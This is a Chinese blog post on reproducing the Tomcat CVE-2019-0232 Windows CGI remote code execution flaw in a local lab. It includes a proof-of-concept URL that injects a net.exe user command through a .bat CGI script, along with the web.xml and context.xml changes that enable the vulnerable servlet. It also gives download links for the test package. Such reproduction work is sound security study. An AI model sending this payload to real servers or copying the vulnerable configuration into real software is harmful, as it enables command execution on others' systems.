起因,一老哥给我发来这玩意,一眼看上去,哇,牛逼。

blob.jpg
blob.jpg

Apache Tomcat高危远程代码执行漏洞
CVE-2019-0232:
Windows上的Apache Tomcat远程执行代码

http:// localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Cnet.exe+user

参考:https://github.com/pyn3rd/CVE-2019-0232


于是第二天:

blob.jpg

blob.jpg

去官方找的tomcat包

http://archive.apache.org/dist/tomcat/tomcat-8/v8.5.39/src/

blob.jpg

然后第一个坑就是这么来的…

blob.jpg

老哥折腾了半天都没部署好tomcat

然后我还嘲笑了那位老哥,直到我去搞的时候,我才知道错了。

blob.jpg

blob.jpg

blob.jpg

于是我怀疑是tomcat包的问题。

于是我去问了另一个在复现的老哥。

blob.jpg

blob.jpg

blob.jpg

blob.jpg

于是第一个坑就这么解决了,过程差点没搞自闭。折腾了各种环境变量啥的。

blob.jpg

不过那个老哥复现失败了,唔.. 我就知道后面绝对还有****等着我。


同时我把解决这个坑的原因告诉了这位老哥。

blob.jpg

接下来按照作者的来改。
conf\web.xml文件:

<servlet> <servlet-name>cgi</servlet-name> <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class> <init-param> <param-name>debug</param-name> <param-value>0</param-value> </init-param> <init-param> <param-name>cgiPathPrefix</param-name> <param-value>WEB-INF/cgi-bin</param-value> </init-param> <init-param> <param-name>executable</param-name> <param-value></param-value> </init-param> <load-on-startup>5</load-on-startup> </servlet>

conf\content.xml文件

<Context privileged=“true”>

&lt;!-- Default set of monitored resources. If one of these changes, the    --&gt;
&lt;!-- web application will be reloaded.                                   --&gt;
&lt;WatchedResource&gt;WEB-INF/web.xml&lt;/WatchedResource&gt;
&lt;WatchedResource&gt;${catalina.base}/conf/web.xml&lt;/WatchedResource&gt;

&lt;!-- Uncomment this to disable session persistence across Tomcat restarts --&gt;
&lt;!--
&lt;Manager pathname="" /&gt;
--&gt;

</Context>

作者还写了这么一句话

Move WEB-INF to $CATALINA_HOME/webapps/ROOT and start TOMCAT server

翻译成大白话就是
把WEB-INF 移到 $CATALINA_HOME/webapps/ROOT 里面 然后启动tomcat
$CATALINA_HOME就是tomcat的文件目录
WEB-INF就是作者放在github里面的文件

于是去下载

blob.jpg

覆盖到

blob.jpg

于是….

blob.jpg

blob.jpg

我们三又遇到了同样的问题。

hello.bat直接是下载的。压根就没啥执行。

blob.jpg

没办法,大家都遇到同样的问题。接下来只能看自己的了,没有前人带路,自己瞎折腾试试。

自己捣鼓了半天,终于发现问题出现在哪里了。

conf\web.xml文件:

blob.jpg

这里还需要把注释去掉,作者没写明白。

于是乎

blob.jpg

终于搞定了。

blob.jpg

blob.jpg

blob.jpg

blob.jpg

blob.jpg


blob.jpg

blob.jpg

blob.jpg

blob.jpg

blob.jpg


apache-tomcat-8.5.39
链接:https://pan.baidu.com/s/1bwokvUhWxZeRq--6pti_6g
提取码:jdm9

CVE-2019-0232-master
链接:https://pan.baidu.com/s/10NzgiJAqKOjgJCn3bWvS5g
提取码:m6uy